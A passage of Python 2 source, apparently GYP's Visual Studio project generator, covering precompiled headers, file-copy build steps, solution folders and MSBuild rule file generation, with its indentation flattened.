precomped = [_FixPath(config.get(i, '')) for i in precomp_keys]
# Don't do this for ones that are precompiled header related.
if f not in precomped:
excluded_configs.append((config_name, config))
exclusions[f] = excluded_configs
# If any non-native rules use 'idl' as an extension exclude idl files.
# Exclude them now.
for f in excluded_idl:
excluded_configs = []
for config_name, config in spec['configurations'].iteritems():
excluded_configs.append((config_name, config))
exclusions[f] = excluded_configs
return exclusions
def _AddToolFilesToMSVS(p, spec):
# Add in tool files (rules).
tool_files = OrderedSet()
for _, config in spec['configurations'].iteritems():
for f in config.get('msvs_tool_files', []):
tool_files.add(f)
for f in tool_files:
p.AddToolFile(f)
def _HandlePreCompiledHeaders(p, sources, spec):
# Pre-compiled header source stubs need a different compiler flag
# (generate precompiled header) and any source file not of the same
# kind (i.e. C vs. C++) as the precompiled header source stub needs
# to have use of precompiled headers disabled.
extensions_excluded_from_precompile = []
for config_name, config in spec['configurations'].iteritems():
source = config.get('msvs_precompiled_source')
if source:
source = _FixPath(source)
# UsePrecompiledHeader=1 for if using precompiled headers.
tool = MSVSProject.Tool('VCCLCompilerTool',
{'UsePrecompiledHeader': '1'})
p.AddFileConfig(source, _ConfigFullName(config_name, config),
{}, tools=[tool])
basename, extension = os.path.splitext(source)
if extension == '.c':
extensions_excluded_from_precompile = ['.cc', '.cpp', '.cxx']
else:
extensions_excluded_from_precompile = ['.c']
def DisableForSourceTree(source_tree):
for source in source_tree:
if isinstance(source, MSVSProject.Filter):
DisableForSourceTree(source.contents)
else:
basename, extension = os.path.splitext(source)
if extension in extensions_excluded_from_precompile:
for config_name, config in spec['configurations'].iteritems():
tool = MSVSProject.Tool('VCCLCompilerTool',
{'UsePrecompiledHeader': '0',
'ForcedIncludeFiles': '$(NOINHERIT)'})
p.AddFileConfig(_FixPath(source),
_ConfigFullName(config_name, config),
{}, tools=[tool])
# Do nothing if there was no precompiled source.
if extensions_excluded_from_precompile:
DisableForSourceTree(sources)
def _AddActions(actions_to_add, spec, relative_path_of_gyp_file):
# Add actions.
actions = spec.get('actions', [])
# Don't setup_env every time. When all the actions are run together in one
# batch file in VS, the PATH will grow too long.
# Membership in this set means that the cygwin environment has been set up,
# and does not need to be set up again.
have_setup_env = set()
for a in actions:
# Attach actions to the gyp file if nothing else is there.
inputs = a.get('inputs') or [relative_path_of_gyp_file]
attached_to = inputs[0]
need_setup_env = attached_to not in have_setup_env
cmd = _BuildCommandLineForRule(spec, a, has_input_path=False,
do_setup_env=need_setup_env)
have_setup_env.add(attached_to)
# Add the action.
_AddActionStep(actions_to_add,
inputs=inputs,
outputs=a.get('outputs', []),
description=a.get('message', a['action_name']),
command=cmd)
def _WriteMSVSUserFile(project_path, version, spec):
# Add run_as and test targets.
if 'run_as' in spec:
run_as = spec['run_as']
action = run_as.get('action', [])
environment = run_as.get('environment', [])
working_directory = run_as.get('working_directory', '.')
elif int(spec.get('test', 0)):
action = ['$(TargetPath)', '--gtest_print_time']
environment = []
working_directory = '.'
else:
return # Nothing to add
# Write out the user file.
user_file = _CreateMSVSUserFile(project_path, version, spec)
for config_name, c_data in spec['configurations'].iteritems():
user_file.AddDebugSettings(_ConfigFullName(config_name, c_data),
action, environment, working_directory)
user_file.WriteIfChanged()
def _AddCopies(actions_to_add, spec):
copies = _GetCopies(spec)
for inputs, outputs, cmd, description in copies:
_AddActionStep(actions_to_add, inputs=inputs, outputs=outputs,
description=description, command=cmd)
def _GetCopies(spec):
copies = []
# Add copies.
for cpy in spec.get('copies', []):
for src in cpy.get('files', []):
dst = os.path.join(cpy['destination'], os.path.basename(src))
# _AddCustomBuildToolForMSVS() will call _FixPath() on the inputs and
# outputs, so do the same for our generated command line.
if src.endswith('/'):
src_bare = src[:-1]
base_dir = posixpath.split(src_bare)[0]
outer_dir = posixpath.split(src_bare)[1]
cmd = 'cd "%s" && xcopy /e /f /y "%s" "%s\\%s\\"' % (
_FixPath(base_dir), outer_dir, _FixPath(dst), outer_dir)
copies.append(([src], ['dummy_copies', dst], cmd,
'Copying %s to %s' % (src, dst)))
else:
cmd = 'mkdir "%s" 2>nul & set ERRORLEVEL=0 & copy /Y "%s" "%s"' % (
_FixPath(cpy['destination']), _FixPath(src), _FixPath(dst))
copies.append(([src], [dst], cmd, 'Copying %s to %s' % (src, dst)))
return copies
def _GetPathDict(root, path):
# |path| will eventually be empty (in the recursive calls) if it was initially
# relative; otherwise it will eventually end up as '\', 'D:\', etc.
if not path or path.endswith(os.sep):
return root
parent, folder = os.path.split(path)
parent_dict = _GetPathDict(root, parent)
if folder not in parent_dict:
parent_dict[folder] = dict()
return parent_dict[folder]
def _DictsToFolders(base_path, bucket, flat):
# Convert to folders recursively.
children = []
for folder, contents in bucket.iteritems():
if type(contents) == dict:
folder_children = _DictsToFolders(os.path.join(base_path, folder),
contents, flat)
if flat:
children += folder_children
else:
folder_children = MSVSNew.MSVSFolder(os.path.join(base_path, folder),
name='(' + folder + ')',
entries=folder_children)
children.append(folder_children)
else:
children.append(contents)
return children
def _CollapseSingles(parent, node):
# Recursively explorer the tree of dicts looking for projects which are
# the sole item in a folder which has the same name as the project. Bring
# such projects up one level.
if (type(node) == dict and
len(node) == 1 and
node.keys()[0] == parent + '.vcproj'):
return node[node.keys()[0]]
if type(node) != dict:
return node
for child in node:
node[child] = _CollapseSingles(child, node[child])
return node
def _GatherSolutionFolders(sln_projects, project_objects, flat):
root = {}
# Convert into a tree of dicts on path.
for p in sln_projects:
gyp_file, target = gyp.common.ParseQualifiedTarget(p)[0:2]
gyp_dir = os.path.dirname(gyp_file)
path_dict = _GetPathDict(root, gyp_dir)
path_dict[target + '.vcproj'] = project_objects[p]
# Walk down from the top until we hit a folder that has more than one entry.
# In practice, this strips the top-level "src/" dir from the hierarchy in
# the solution.
while len(root) == 1 and type(root[root.keys()[0]]) == dict:
root = root[root.keys()[0]]
# Collapse singles.
root = _CollapseSingles('', root)
# Merge buckets until everything is a root entry.
return _DictsToFolders('', root, flat)
def _GetPathOfProject(qualified_target, spec, options, msvs_version):
default_config = _GetDefaultConfiguration(spec)
proj_filename = default_config.get('msvs_existing_vcproj')
if not proj_filename:
proj_filename = (spec['target_name'] + options.suffix +
msvs_version.ProjectExtension())
build_file = gyp.common.BuildFile(qualified_target)
proj_path = os.path.join(os.path.dirname(build_file), proj_filename)
fix_prefix = None
if options.generator_output:
project_dir_path = os.path.dirname(os.path.abspath(proj_path))
proj_path = os.path.join(options.generator_output, proj_path)
fix_prefix = gyp.common.RelativePath(project_dir_path,
os.path.dirname(proj_path))
return proj_path, fix_prefix
def _GetPlatformOverridesOfProject(spec):
# Prepare a dict indicating which project configurations are used for which
# solution configurations for this target.
config_platform_overrides = {}
for config_name, c in spec['configurations'].iteritems():
config_fullname = _ConfigFullName(config_name, c)
platform = c.get('msvs_target_platform', _ConfigPlatform(c))
fixed_config_fullname = '%s|%s' % (
_ConfigBaseName(config_name, _ConfigPlatform(c)), platform)
config_platform_overrides[config_fullname] = fixed_config_fullname
return config_platform_overrides
def _CreateProjectObjects(target_list, target_dicts, options, msvs_version):
"""Create a MSVSProject object for the targets found in target list.
Arguments:
target_list: the list of targets to generate project objects for.
target_dicts: the dictionary of specifications.
options: global generator options.
msvs_version: the MSVSVersion object.
Returns:
A set of created projects, keyed by target.
"""
global fixpath_prefix
# Generate each project.
projects = {}
for qualified_target in target_list:
spec = target_dicts[qualified_target]
if spec['toolset'] != 'target':
raise GypError(
'Multiple toolsets not supported in msvs build (target %s)' %
qualified_target)
proj_path, fixpath_prefix = _GetPathOfProject(qualified_target, spec,
options, msvs_version)
guid = _GetGuidOfProject(proj_path, spec)
overrides = _GetPlatformOverridesOfProject(spec)
build_file = gyp.common.BuildFile(qualified_target)
# Create object for this project.
obj = MSVSNew.MSVSProject(
proj_path,
name=spec['target_name'],
guid=guid,
spec=spec,
build_file=build_file,
config_platform_overrides=overrides,
fixpath_prefix=fixpath_prefix)
# Set project toolset if any (MS build only)
if msvs_version.UsesVcxproj():
obj.set_msbuild_toolset(
_GetMsbuildToolsetOfProject(proj_path, spec, msvs_version))
projects[qualified_target] = obj
# Set all the dependencies, but not if we are using an external builder like
# ninja
for project in projects.values():
if not project.spec.get('msvs_external_builder'):
deps = project.spec.get('dependencies', [])
deps = [projects[d] for d in deps]
project.set_dependencies(deps)
return projects
def _InitNinjaFlavor(options, target_list, target_dicts):
"""Initialize targets for the ninja flavor.
This sets up the necessary variables in the targets to generate msvs projects
that use ninja as an external builder. The variables in the spec are only set
if they have not been set. This allows individual specs to override the
default values initialized here.
Arguments:
options: Options provided to the generator.
target_list: List of target pairs: 'base/base.gyp:base'.
target_dicts: Dict of target properties keyed on target pair.
"""
for qualified_target in target_list:
spec = target_dicts[qualified_target]
if spec.get('msvs_external_builder'):
# The spec explicitly defined an external builder, so don't change it.
continue
path_to_ninja = spec.get('msvs_path_to_ninja', 'ninja.exe')
spec['msvs_external_builder'] = 'ninja'
if not spec.get('msvs_external_builder_out_dir'):
spec['msvs_external_builder_out_dir'] = \
options.depth + '/out/$(Configuration)'
if not spec.get('msvs_external_builder_build_cmd'):
spec['msvs_external_builder_build_cmd'] = [
path_to_ninja,
'-C',
'$(OutDir)',
'$(ProjectName)',
]
if not spec.get('msvs_external_builder_clean_cmd'):
spec['msvs_external_builder_clean_cmd'] = [
path_to_ninja,
'-C',
'$(OutDir)',
'-t',
'clean',
'$(ProjectName)',
]
def CalculateVariables(default_variables, params):
"""Generated variables that require params to be known."""
generator_flags = params.get('generator_flags', {})
# Select project file format version (if unset, default to auto detecting).
msvs_version = MSVSVersion.SelectVisualStudioVersion(
generator_flags.get('msvs_version', 'auto'))
# Stash msvs_version for later (so we don't have to probe the system twice).
params['msvs_version'] = msvs_version
# Set a variable so conditions can be based on msvs_version.
default_variables['MSVS_VERSION'] = msvs_version.ShortName()
# To determine processor word size on Windows, in addition to checking
# PROCESSOR_ARCHITECTURE (which reflects the word size of the current
# process), it is also necessary to check PROCESSOR_ARCITEW6432 (which
# contains the actual word size of the system when running thru WOW64).
if (os.environ.get('PROCESSOR_ARCHITECTURE', '').find('64') >= 0 or
os.environ.get('PROCESSOR_ARCHITEW6432', '').find('64') >= 0):
default_variables['MSVS_OS_BITS'] = 64
else:
default_variables['MSVS_OS_BITS'] = 32
if gyp.common.GetFlavor(params) == 'ninja':
default_variables['SHARED_INTERMEDIATE_DIR'] = '$(OutDir)gen'
def PerformBuild(data, configurations, params):
options = params['options']
msvs_version = params['msvs_version']
devenv = os.path.join(msvs_version.path, 'Common7', 'IDE', 'devenv.com')
for build_file, build_file_dict in data.iteritems():
(build_file_root, build_file_ext) = os.path.splitext(build_file)
if build_file_ext != '.gyp':
continue
sln_path = build_file_root + options.suffix + '.sln'
if options.generator_output:
sln_path = os.path.join(options.generator_output, sln_path)
for config in configurations:
arguments = [devenv, sln_path, '/Build', config]
print 'Building [%s]: %s' % (config, arguments)
rtn = subprocess.check_call(arguments)
def GenerateOutput(target_list, target_dicts, data, params):
"""Generate .sln and .vcproj files.
This is the entry point for this generator.
Arguments:
target_list: List of target pairs: 'base/base.gyp:base'.
target_dicts: Dict of target properties keyed on target pair.
data: Dictionary containing per .gyp data.
"""
global fixpath_prefix
options = params['options']
# Get the project file format version back out of where we stashed it in
# GeneratorCalculatedVariables.
msvs_version = params['msvs_version']
generator_flags = params.get('generator_flags', {})
# Optionally shard targets marked with 'msvs_shard': SHARD_COUNT.
(target_list, target_dicts) = MSVSUtil.ShardTargets(target_list, target_dicts)
# Optionally use the large PDB workaround for targets marked with
# 'msvs_large_pdb': 1.
(target_list, target_dicts) = MSVSUtil.InsertLargePdbShims(
target_list, target_dicts, generator_default_variables)
# Optionally configure each spec to use ninja as the external builder.
if params.get('flavor') == 'ninja':
_InitNinjaFlavor(options, target_list, target_dicts)
# Prepare the set of configurations.
configs = set()
for qualified_target in target_list:
spec = target_dicts[qualified_target]
for config_name, config in spec['configurations'].iteritems():
configs.add(_ConfigFullName(config_name, config))
configs = list(configs)
# Figure out all the projects that will be generated and their guids
project_objects = _CreateProjectObjects(target_list, target_dicts, options,
msvs_version)
# Generate each project.
missing_sources = []
for project in project_objects.values():
fixpath_prefix = project.fixpath_prefix
missing_sources.extend(_GenerateProject(project, options, msvs_version,
generator_flags))
fixpath_prefix = None
for build_file in data:
# Validate build_file extension
if not build_file.endswith('.gyp'):
continue
sln_path = os.path.splitext(build_file)[0] + options.suffix + '.sln'
if options.generator_output:
sln_path = os.path.join(options.generator_output, sln_path)
# Get projects in the solution, and their dependents.
sln_projects = gyp.common.BuildFileTargets(target_list, build_file)
sln_projects += gyp.common.DeepDependencyTargets(target_dicts, sln_projects)
# Create folder hierarchy.
root_entries = _GatherSolutionFolders(
sln_projects, project_objects, flat=msvs_version.FlatSolution())
# Create solution.
sln = MSVSNew.MSVSSolution(sln_path,
entries=root_entries,
variants=configs,
websiteProperties=False,
version=msvs_version)
sln.Write()
if missing_sources:
error_message = "Missing input files:\n" + \
'\n'.join(set(missing_sources))
if generator_flags.get('msvs_error_on_missing_sources', False):
raise GypError(error_message)
else:
print >> sys.stdout, "Warning: " + error_message
def _GenerateMSBuildFiltersFile(filters_path, source_files,
extension_to_rule_name):
"""Generate the filters file.
This file is used by Visual Studio to organize the presentation of source
files into folders.
Arguments:
filters_path: The path of the file to be created.
source_files: The hierarchical structure of all the sources.
extension_to_rule_name: A dictionary mapping file extensions to rules.
"""
filter_group = []
source_group = []
_AppendFiltersForMSBuild('', source_files, extension_to_rule_name,
filter_group, source_group)
if filter_group:
content = ['Project',
{'ToolsVersion': '4.0',
'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'
},
['ItemGroup'] + filter_group,
['ItemGroup'] + source_group
]
easy_xml.WriteXmlIfChanged(content, filters_path, pretty=True, win32=True)
elif os.path.exists(filters_path):
# We don't need this filter anymore. Delete the old filter file.
os.unlink(filters_path)
def _AppendFiltersForMSBuild(parent_filter_name, sources,
extension_to_rule_name,
filter_group, source_group):
"""Creates the list of filters and sources to be added in the filter file.
Args:
parent_filter_name: The name of the filter under which the sources are
found.
sources: The hierarchy of filters and sources to process.
extension_to_rule_name: A dictionary mapping file extensions to rules.
filter_group: The list to which filter entries will be appended.
source_group: The list to which source entries will be appeneded.
"""
for source in sources:
if isinstance(source, MSVSProject.Filter):
# We have a sub-filter. Create the name of that sub-filter.
if not parent_filter_name:
filter_name = source.name
else:
filter_name = '%s\\%s' % (parent_filter_name, source.name)
# Add the filter to the group.
filter_group.append(
['Filter', {'Include': filter_name},
['UniqueIdentifier', MSVSNew.MakeGuid(source.name)]])
# Recurse and add its dependents.
_AppendFiltersForMSBuild(filter_name, source.contents,
extension_to_rule_name,
filter_group, source_group)
else:
# It's a source. Create a source entry.
_, element = _MapFileToMsBuildSourceType(source, extension_to_rule_name)
source_entry = [element, {'Include': source}]
# Specify the filter it is part of, if any.
if parent_filter_name:
source_entry.append(['Filter', parent_filter_name])
source_group.append(source_entry)
def _MapFileToMsBuildSourceType(source, extension_to_rule_name):
"""Returns the group and element type of the source file.
Arguments:
source: The source file name.
extension_to_rule_name: A dictionary mapping file extensions to rules.
Returns:
A pair of (group this file should be part of, the label of element)
"""
_, ext = os.path.splitext(source)
if ext in extension_to_rule_name:
group = 'rule'
element = extension_to_rule_name[ext]
elif ext in ['.cc', '.cpp', '.c', '.cxx']:
group = 'compile'
element = 'ClCompile'
elif ext in ['.h', '.hxx']:
group = 'include'
element = 'ClInclude'
elif ext == '.rc':
group = 'resource'
element = 'ResourceCompile'
elif ext == '.idl':
group = 'midl'
element = 'Midl'
else:
group = 'none'
element = 'None'
return (group, element)
def _GenerateRulesForMSBuild(output_dir, options, spec,
sources, excluded_sources,
props_files_of_rules, targets_files_of_rules,
actions_to_add, extension_to_rule_name):
# MSBuild rules are implemented using three files: an XML file, a .targets
# file and a .props file.
# See http://blogs.msdn.com/b/vcblog/archive/2010/04/21/quick-help-on-vs2010-custom-build-rule.aspx
# for more details.
rules = spec.get('rules', [])
rules_native = [r for r in rules if not int(r.get('msvs_external_rule', 0))]
rules_external = [r for r in rules if int(r.get('msvs_external_rule', 0))]
msbuild_rules = []
for rule in rules_native:
# Skip a rule with no action and no inputs.
if 'action' not in rule and not rule.get('rule_sources', []):
continue
msbuild_rule = MSBuildRule(rule, spec)
msbuild_rules.append(msbuild_rule)
extension_to_rule_name[msbuild_rule.extension] = msbuild_rule.rule_name
if msbuild_rules:
base = spec['target_name'] + options.suffix
props_name = base + '.props'
targets_name = base + '.targets'
xml_name = base + '.xml'
props_files_of_rules.add(props_name)
targets_files_of_rules.add(targets_name)
props_path = os.path.join(output_dir, props_name)
targets_path = os.path.join(output_dir, targets_name)
xml_path = os.path.join(output_dir, xml_name)
_GenerateMSBuildRulePropsFile(props_path, msbuild_rules)
_GenerateMSBuildRuleTargetsFile(targets_path, msbuild_rules)
_GenerateMSBuildRuleXmlFile(xml_path, msbuild_rules)
if rules_external:
_GenerateExternalRules(rules_external, output_dir, spec,
sources, options, actions_to_add)
_AdjustSourcesForRules(spec, rules, sources, excluded_sources)
class MSBuildRule(object):
"""Used to store information used to generate an MSBuild rule.
Attributes:
rule_name: The rule name, sanitized to use in XML.
target_name: The name of the target.
after_targets: The name of the AfterTargets element.
before_targets: The name of the BeforeTargets element.
depends_on: The name of the DependsOn element.
compute_output: The name of the ComputeOutput element.
dirs_to_make: The name of the DirsToMake element.
inputs: The name of the _inputs element.
tlog: The name of the _tlog element.
extension: The extension this rule applies to.
description: The message displayed when this rule is invoked.
additional_dependencies: A string listing additional dependencies.
outputs: The outputs of this rule.
command: The command used to run the rule.
"""
def __init__(self, rule, spec):
self.display_name = rule['rule_name']
# Assure that the rule name is only characters and numbers
self.rule_name = re.sub(r'\W', '_', self.display_name)
# Create the various element names, following the example set by the
# Visual Studio 2008 to 2010 conversion. I don't know if VS2010
# is sensitive to the exact names.
self.target_name = '_' + self.rule_name
self.after_targets = self.rule_name + 'AfterTargets'
self.before_targets = self.rule_name + 'BeforeTargets'
self.depends_on = self.rule_name + 'DependsOn'
self.compute_output = 'Compute%sOutput' % self.rule_name
self.dirs_to_make = self.rule_name + 'DirsToMake'
self.inputs = self.rule_name + '_inputs'
self.tlog = self.rule_name + '_tlog'
self.extension = rule['extension']
if not self.extension.startswith('.'):
self.extension = '.' + self.extension
self.description = MSVSSettings.ConvertVCMacrosToMSBuild(
rule.get('message', self.rule_name))
old_additional_dependencies = _FixPaths(rule.get('inputs', []))
self.additional_dependencies = (
';'.join([MSVSSettings.ConvertVCMacrosToMSBuild(i)
for i in old_additional_dependencies]))
old_outputs = _FixPaths(rule.get('outputs', []))
self.outputs = ';'.join([MSVSSettings.ConvertVCMacrosToMSBuild(i)
for i in old_outputs])
old_command = _BuildCommandLineForRule(spec, rule, has_input_path=True,
do_setup_env=True)
self.command = MSVSSettings.ConvertVCMacrosToMSBuild(old_command)
def _GenerateMSBuildRulePropsFile(props_path, msbuild_rules):
"""Generate the .props file."""
content = ['Project',
{'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'}]
for rule in msbuild_rules:
content.extend([
['PropertyGroup',
{'Condition': "'$(%s)' == '' and '$(%s)' == '' and "
"'$(ConfigurationType)' != 'Makefile'" % (rule.before_targets,
rule.after_targets)
},
[rule.before_targets, 'Midl'],
[rule.after_targets, 'CustomBuild'],
],
['PropertyGroup',
[rule.depends_on,
{'Condition': "'$(ConfigurationType)' != 'Makefile'"},
'_SelectedFiles;$(%s)' % rule.depends_on
],
],
['ItemDefinitionGroup',
[rule.rule_name,
['CommandLineTemplate', rule.command],
['Outputs', rule.outputs],
['ExecutionDescription', rule.description],
['AdditionalDependencies', rule.additional_dependencies],
],
]
])
easy_xml.WriteXmlIfChanged(content, props_path, pretty=True, win32=True)
def _GenerateMSBuildRuleTargetsFile(targets_path, msbuild_rules):
"""Generate the .targets file."""
content = ['Project',
{'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'
}
]
item_group = [
'ItemGroup',
['PropertyPageSchema',
{'Include': '$(MSBuildThisFileDirectory)$(MSBuildThisFileName).xml'}
]
]
for rule in msbuild_rules:
item_group.append(
['AvailableItemName',
{'Include': rule.rule_name},
['Targets', rule.target_name],
])
content.append(item_group)
for rule in msbuild_rules:
content.append(
['UsingTask',
{'TaskName': rule.rule_name,
'TaskFactory': 'XamlTaskFactory',
'AssemblyName': 'Microsoft.Build.Tasks.v4.0'
},
['Task', '$(MSBuildThisFileDirectory)$(MSBuildThisFileName).xml'],
])
for rule in msbuild_rules:
rule_name = rule.rule_name
target_outputs = '%%(%s.Outputs)' % rule_name
target_inputs = ('%%(%s.Identity);%%(%s.AdditionalDependencies);'
'$(MSBuildProjectFile)') % (rule_name, rule_name)
rule_inputs = '%%(%s.Identity)' % rule_name
extension_condition = ("'%(Extension)'=='.obj' or "
"'%(Extension)'=='.res' or "
"'%(Extension)'=='.rsc' or "
"'%(Extension)'=='.lib'")
remove_section = [
'ItemGroup',
{'Condition': "'@(SelectedFiles)' != ''"},
[rule_name,
{'Remove': '@(%s)' % rule_name,
'Condition': "'%(Identity)' != '@(SelectedFiles)'"
}
]
]
inputs_section = [
'ItemGroup',
[rule.inputs, {'Include': '%%(%s.AdditionalDependencies)' % rule_name}]
]
logging_section = [
'ItemGroup',
[rule.tlog,
{'Include': '%%(%s.Outputs)' % rule_name,
'Condition': ("'%%(%s.Outputs)' != '' and "
"'%%(%s.ExcludedFromBuild)' != 'true'" %
(rule_name, rule_name))
},
['Source', "@(%s, '|')" % rule_name],
['Inputs', "@(%s -> '%%(Fullpath)', ';')" % rule.inputs],
],
]
message_section = [
'Message',
{'Importance': 'High',
'Text': '%%(%s.ExecutionDescription)' % rule_name
}
]
write_tlog_section = [
'WriteLinesToFile',
{'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
"'true'" % (rule.tlog, rule.tlog),
'File': '$(IntDir)$(ProjectName).write.1.tlog',
'Lines': "^%%(%s.Source);@(%s->'%%(Fullpath)')" % (rule.tlog,
rule.tlog)
}
]
read_tlog_section = [
'WriteLinesToFile',
{'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
"'true'" % (rule.tlog, rule.tlog),
'File': '$(IntDir)$(ProjectName).read.1.tlog',
'Lines': "^%%(%s.Source);%%(%s.Inputs)" % (rule.tlog, rule.tlog)
}
]
command_and_input_section = [
rule_name,
{'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
"'true'" % (rule_name, rule_name),
'CommandLineTemplate': '%%(%s.CommandLineTemplate)' % rule_name,
'AdditionalOptions': '%%(%s.AdditionalOptions)' % rule_name,
'Inputs': rule_inputs
}
]
content.extend([
['Target',
{'Name': rule.target_name,
'BeforeTargets': '$(%s)' % rule.before_targets,
'AfterTargets': '$(%s)' % rule.after_targets,
'Condition': "'@(%s)' != ''" % rule_name,
'DependsOnTargets': '$(%s);%s' % (rule.depends_on,
rule.compute_output),
'Outputs': target_outputs,
'Inputs': target_inputs
},
remove_section,
inputs_section,
logging_section,
message_section,
write_tlog_section,
read_tlog_section,
command_and_input_section,
],
['PropertyGroup',
['ComputeLinkInputsTargets',
'$(ComputeLinkInputsTargets);',
'%s;' % rule.compute_output
],
['ComputeLibInputsTargets',
'$(ComputeLibInputsTargets);',
'%s;' % rule.compute_output
],
],
['Target',
{'Name': rule.compute_output,
'Condition': "'@(%s)' != ''" % rule_name
},
['ItemGroup',
[rule.dirs_to_make,
{'Condition': "'@(%s)' != '' and "
"'%%(%s.ExcludedFromBuild)' != 'true'" % (rule_name, rule_name),
'Include': '%%(%s.Outputs)' % rule_name
}
],
['Link',
{'Include': '%%(%s.Identity)' % rule.dirs_to_make,
'Condition': extension_condition
}
],
['Lib',
{'Include': '%%(%s.Identity)' % rule.dirs_to_make,
'Condition': extension_condition
}
],
['ImpLib',
{'Include': '%%(%s.Identity)' % rule.dirs_to_make,
'Condition': extension_condition
}
],
],
['MakeDir',
{'Directories': ("@(%s->'%%(RootDir)%%(Directory)')" %
rule.dirs_to_make)
}
]
],
])
easy_xml.WriteXmlIfChanged(content, targets_path, pretty=True, win32=True)
def _GenerateMSBuildRuleXmlFile(xml_path, msbuild_rules):
# Generate the .xml file
content = [
'ProjectSchemaDefinitions',
{'xmlns': ('clr-namespace:Microsoft.Build.Framework.XamlTypes;'
'assembly=Microsoft.Build.Framework'),
'xmlns:x': 'http://schemas.microsoft.com/winfx/2006/xaml',
'xmlns:sys': 'clr-namespace:System;assembly=mscorlib',
'xmlns:transformCallback':
'Microsoft.Cpp.Dev10.ConvertPropertyCallback'
}
]
for rule in msbuild_rules:
content.extend([
['Rule',
{'Name': rule.rule_name,
'PageTemplate': 'tool',
'DisplayName': rule.display_name,
'Order': '200'
},
['Rule.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'ItemType': rule.rule_name
}
]
],
['Rule.Categories',
['Category',
{'Name': 'General'},
['Category.DisplayName',
['sys:String', 'General'],
],
],
['Category',
{'Name': 'Command Line',
'Subtype': 'CommandLine'
},
['Category.DisplayName',
['sys:String', 'Command Line'],
],
],
],
['StringListProperty',
{'Name': 'Inputs',
'Category': 'Command Line',
'IsRequired': 'true',
'Switch': ' '
},
['StringListProperty.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'ItemType': rule.rule_name,
'SourceType': 'Item'
}
]
],
],
['StringProperty',
{'Name': 'CommandLineTemplate',
'DisplayName': 'Command Line',
'Visible': 'False',
'IncludeInCommandLine': 'False'
}
],
['DynamicEnumProperty',
{'Name': rule.before_targets,
'Category': 'General',
'EnumProvider': 'Targets',
'IncludeInCommandLine': 'False'
},
['DynamicEnumProperty.DisplayName',
['sys:String', 'Execute Before'],
],
['DynamicEnumProperty.Description',
['sys:String', 'Specifies the targets for the build customization'
' to run before.'
],
],
['DynamicEnumProperty.ProviderSettings',
['NameValuePair',
{'Name': 'Exclude',
'Value': '^%s|^Compute' % rule.before_targets
}
]
],
['DynamicEnumProperty.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'HasConfigurationCondition': 'true'
}
]
],
],
['DynamicEnumProperty',
{'Name': rule.after_targets,
'Category': 'General',
'EnumProvider': 'Targets',
'IncludeInCommandLine': 'False'
},
['DynamicEnumProperty.DisplayName',
['sys:String', 'Execute After'],
],
['DynamicEnumProperty.Description',
['sys:String', ('Specifies the targets for the build customization'
' to run after.')
],
],
['DynamicEnumProperty.ProviderSettings',
['NameValuePair',
{'Name': 'Exclude',
'Value': '^%s|^Compute' % rule.after_targets
}
]
],
['DynamicEnumProperty.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'ItemType': '',
'HasConfigurationCondition': 'true'
}
]
],
],
['StringListProperty',
{'Name': 'Outputs',
'DisplayName': 'Outputs',
'Visible': 'False',
'IncludeInCommandLine': 'False'
}
],
['StringProperty',
{'Name': 'ExecutionDescription',
'DisplayName': 'Execution Description',
'Visible': 'False',
'IncludeInCommandLine': 'False'
}
],
['StringListProperty',
{'Name': 'AdditionalDependencies',
'DisplayName': 'Additional Dependencies',
'IncludeInCommandLine': 'False',
'Visible': 'false'
}
],
['StringProperty',
{'Subtype': 'AdditionalOptions',
'Name': 'AdditionalOptions',
'Category': 'Command Line'
},
['StringProperty.DisplayName',
['sys:String', 'Additional Options'],
],
['StringProperty.Description',
['sys:String', 'Additional Options'],
],
],
],
['ItemType',
{'Name': rule.rule_name,
'DisplayName': rule.display_name
}
],
['FileExtension',
{'Name': '*' + rule.extension,
'ContentType': rule.rule_name
}
],
['ContentType',
{'Name': rule.rule_name,
'DisplayName': '',
'ItemType': rule.rule_name
}
]
])
easy_xml.WriteXmlIfChanged(content, xml_path, pretty=True, win32=True)
def _GetConfigurationAndPlatform(name, settings):
configuration = name.rsplit('_', 1)[0]
platform = settings.get('msvs_configuration_platform', 'Win32')
return (configuration, platform)
def _GetConfigurationCondition(name, settings):
return (r"'$(Configuration)|$(Platform)'=='%s|%s'" %
_GetConfigurationAndPlatform(name, settings))
def _GetMSBuildProjectConfigurations(configurations):
group = ['ItemGroup', {'Label': 'ProjectConfigurations'}]
for (name, settings) in sorted(configurations.iteritems()):
configuration, platform = _GetConfigurationAndPlatform(name, settings)
designation = '%s|%s' % (configuration, platform)
group.append(
['ProjectConfiguration', {'Include': designation},
['Configuration', configuration],
['Platform', platform]])
return [group]
def _GetMSBuildGlobalProperties(spec, guid, gyp_file_name):
namespace = os.path.splitext(gyp_file_name)[0]
return [
['PropertyGroup', {'Label': 'Globals'},
['ProjectGuid', guid],
['Keyword', 'Win32Proj'],
['RootNamespace', namespace],
]
]
def _GetMSBuildConfigurationDetails(spec, build_file):
properties = {}
for name, settings in spec['configurations'].iteritems():
msbuild_attributes = _GetMSBuildAttributes(spec, settings, build_file)
condition = _GetConfigurationCondition(name, settings)
character_set = msbuild_attributes.get('CharacterSet')
_AddConditionalProperty(properties, condition, 'ConfigurationType',
msbuild_attributes['ConfigurationType'])
if character_set:
_AddConditionalProperty(properties, condition, 'CharacterSet',
character_set)
return _GetMSBuildPropertyGroup(spec, 'Configuration', properties)
def _GetMSBuildLocalProperties(msbuild_toolset):
# Currently the only local property we support is PlatformToolset
properties = {}
if msbuild_toolset:
properties = [
['PropertyGroup', {'Label': 'Locals'},
['PlatformToolset', msbuild_toolset],
]
]
return properties
def _GetMSBuildPropertySheets(configurations):
user_props = r'$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props'
additional_props = {}
props_specified = False
for name, settings in sorted(configurations.iteritems()):
configuration = _GetConfigurationCondition(name, settings)
if settings.has_key('msbuild_props'):
additional_props[configuration] = _FixPaths(settings['msbuild_props'])
props_specified = True
else:
additional_props[configuration] = ''
if not props_specified:
return [
['ImportGroup',
{'Label': 'PropertySheets'},
